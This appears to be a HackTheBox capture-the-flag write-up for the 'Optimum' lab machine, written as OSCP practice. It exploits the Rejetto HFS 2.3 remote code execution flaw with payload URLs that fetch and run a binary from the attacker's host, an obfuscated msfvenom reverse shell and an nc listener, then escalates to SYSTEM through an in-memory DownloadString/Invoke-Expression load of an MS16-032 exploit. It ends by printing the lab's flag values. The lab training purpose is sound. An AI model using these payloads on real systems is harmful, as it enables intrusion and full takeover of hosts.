HackTheBox | Optimum

In this walkthrough, I demonstrate how I obtained complete ownership of Optimum on HackTheBox
HackTheBox | Optimum
In: HackTheBox, TJ Null OSCP Practice, OSCP Prep, Attack, CTF

Nmap Results

# Nmap 7.92 scan initiated Mon Aug 15 11:24:32 2022 as: nmap -T5 -p80 -A -oA scan-all -Pn 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.013s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   13.49 ms 10.10.14.1
2   13.94 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 15 11:24:50 2022 -- 1 IP address (1 host up) scanned in 18.44 seconds





Service Enumeration

TCP/80

Check for any other directories and files with gobuster :

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,html -t 10 -r -o gobuster-out.txt

No results from the gobuster enumeration. So, let's focus on the web app in front of us. We've got HttpFileServer httpd 2.3 . If you hover over the link in the server information, we can see that it's Rejetto File Server.

If you check searchsploit for Rejetto, you'll see that there is a Remote Code Execution (RCE) vulnerability listed for this version.





Exploit

I'm going to show you how to exploit this target manually.

Manual Exploit

Read the Documentation

Copy the exploit documentation to your current directory.

searchsploit -m 34668

Now, let's have a look over the exploit information.

less 34668.txt

In the example, we see: http://localhost:80/?search=%00{.exec|cmd.} , let's make sense of what's going on here:

  • The %00 null-byte injection cause the regular expression evaluation to fail
  • This causes the server to .exec (execute) the cmd. (command).



Proof of Concept

Let's test it out. Here's a quick and harmless proof-of-concept (PoC):

  1. Start a Python web server on Kali: sudo python3 -m http.server 80
  2. Connect to the Python web server using the RCE exploit. Invoke powershell.exe to call Invoke-WebRequest on the target to connect to our web server
  3. If we get a connection, getting a reverse shell will be very easy
⚠️
Change the <kali-vpn-ip> template to your HackTheBox VPN IP.
http://10.10.10.8/?search=%00{.exec|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "Invoke-WebRequest http://<kali-vpn-ip>".}

Perfect! Now, let's get ready for the attack.



Exploiting the Target

⚠️
Change the <kali-vpn-ip> and <kali-tcp-port> templates to your HackTheBox VPN IP.
  1. Create a PowerShell reverse shell payload
# Set your VPN IP and TCP port for your listener
# Obfuscate with x64/xor_dynamic
# Remove the usual null-byte bad character

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=<kali-vpn-ip> LPORT=<kali-tcp-port> -e x64/xor_dynamic -b '\x00' -a x64 --platform windows -f exe -o shell.exe

  1. Serve it using the Python web server. You can skip this step if your web server's already running from before.
sudo python3 -m http.server 80

  1. Start a listener using the TCP port you chose in step 1
sudo rlwrap nc -lnvp <port>

  1. Download and execute it on the target
http://10.10.10.8/?search=%00{.exec|powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.6/shell.exe','C:\Windows\Temp\shell.exe')" ; cmd.exe /c "C:\Windows\Temp\shell.exe".}

In Step 4, we are downloading shell.exe from Kali and saving the file C:\Windows\Temp , which is usually a globally-writable directory. Then, we are using cmd.exe to open the C:\Windows\Temp\shell.exe file.





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ??
System Boot Time:          22/8/2022, 3:20:32 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.413 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.624 MB
Virtual Memory: In Use:    879 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Current User

whoami /all

USER INFORMATION
----------------

User Name      SID                                        
============== ===========================================
optimum\kostas S-1-5-21-605891470-2991919448-81205106-1001


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled



Users and Groups

Local Users

net user

User accounts for \\OPTIMUM

-------------------------------------------------------------------------------
Administrator            Guest                    kostas

Local Groups

net localgroup

Aliases for \\OPTIMUM

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Users
*WinRMRemoteWMIUsers__



Network Configurations

Interfaces

Get-NetIPConfiguration
    
InterfaceAlias       : Ethernet0
InterfaceIndex       : 12
InterfaceDescription : Intel(R) 82574L Gigabit Network Connection
IPv4Address          : 10.10.10.8
IPv4DefaultGateway   : 10.10.10.2
DNSServer            : 10.10.10.2

Open Ports

Get-NetTCPConnection

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
::                                  49157     ::                                  0          Listen                    
::                                  49156     ::                                  0          Listen                    
::                                  49155     ::                                  0          Listen                    
::                                  49154     ::                                  0          Listen                    
::                                  49153     ::                                  0          Listen                    
::                                  49152     ::                                  0          Listen                    
::                                  47001     ::                                  0          Listen                    
::                                  5985      ::                                  0          Listen                    
::                                  445       ::                                  0          Listen                    
::                                  135       ::                                  0          Listen                    
10.10.10.8                          49208     10.10.14.6                          443        Established Internet      
0.0.0.0                             49157     0.0.0.0                             0          Listen                    
0.0.0.0                             49156     0.0.0.0                             0          Listen                    
0.0.0.0                             49155     0.0.0.0                             0          Listen                    
0.0.0.0                             49154     0.0.0.0                             0          Listen                    
0.0.0.0                             49153     0.0.0.0                             0          Listen                    
0.0.0.0                             49152     0.0.0.0                             0          Listen                    
10.10.10.8                          139       0.0.0.0                             0          Listen                    
0.0.0.0                             135       0.0.0.0                             0          Listen                    
0.0.0.0                             80        0.0.0.0                             0          Listen





Privilege Escalation

Couldn't find any privilege escalation vectors with any easy wins such unquoted service paths, password mining, ACL issues, etc. So, it seems we'll have to search for some kernel exploits or other unpatched security issues.



Windows-Exploit-Suggester

I really don't like the WindowsExploitSuggesterNG tool, as its output is not pleasant to look at and it returns lots of duplicates (even though it says it's filtering them).



Install Required Python Module

# Any newer versions will not read .xlsx files
# windows-exploit-suggester.py saves the file with .xls extension
# However, the files are really .xlsx format
# xlrd took out compatibility for .xlsx in newer versions
python2 -m pip install xlrd==1.2.0



Clone the GitHub Repository

cd /opt
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
cd Windows-Exploit-Suggester

# Download the latest patch bulletin
python2 windows-exploit-suggester.py -u



Enumerate Patch Level

Target

systeminfo

Copy the output from the systeminfo command and paste it into a file like sysinfo.txt on Kali.



Kali

python2 windows-exploit-suggester.py -i sysinfo.txt -d YYYY-MM-dd-mssb.xls

Take note here of the legend when you run the tool:

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin

Now, look for some potential exploits such as Elevation of Privilege or kernel exploits. I decide to give this exploit a try, as I see there is a PowerShell exploit available for it.

[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)

I had initially tried this exploit: https://www.exploit-db.com/exploits/39719/ , but could not properly spawn a logon shell as SYSTEM due to the non-interactive nature of the reverse shell.

So, I went to Google and did some more research on a public exploit and found this script to try.

Empire/Invoke-MS16032.ps1 at master · EmpireProject/Empire
Empire is a PowerShell and Python post-exploitation agent. - Empire/Invoke-MS16032.ps1 at master · EmpireProject/Empire

The benefit of this script is that it allows you to pass a -Command parameter, so that way we can use a msfvenom payload to spawn a SYSTEM shell.



Running the Exploit

  1. Download the script to Kali
  2. Start a Python web server to transfer the file
sudo python3 -m http.server 80

  1. Load the script on the target
    • We'll use the Invoke-Expression command
    • Combined with the DownloadString() method
    • DownloadString() will download the PowerShell script as raw text from our Python server
    • Invoke-Expression will load the function into memory
  2. Start a listener
  3. Run the exploit (using our existing msfvenom payload the box)
Script downloaded
Web server started and listening on VPN IP address
(New-Object Net.WebClient).DownloadString('http://<kali-vpn-ip>/Invoke-MS16032.ps1') | Invoke-Expression

Replace <kali-vpn-ip> with your IP address

Script downloaded and function loaded into memory

Using the initial exploit to get my first reverse shell, I saved shell.exe to C:\Windows\Temp . I am going to reuse this payload to get the system shell. We can re-use the same port.

sudo rlwrap nc -lnvp <kali-tcp-port>

Change <kali-tcp-port> to the TCP port you used on your original exploit

Run the exploit:

Invoke-MS16032 -Command "cmd.exe /c C:\Windows\Temp\shell.exe"

Run the command as SYSTEM and generate another reverse shell

The command takes about 5 seconds to run and then we're SYSTEM !





Flags

C:\Users\kostas\Desktop\user.txt.txt

d0c39409d7b994a9a1389ebf38ef5f73

C:\Users\Administrator\Desktop\root.txt

51ed1b36553c8461f4552c2e92b3eeed
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.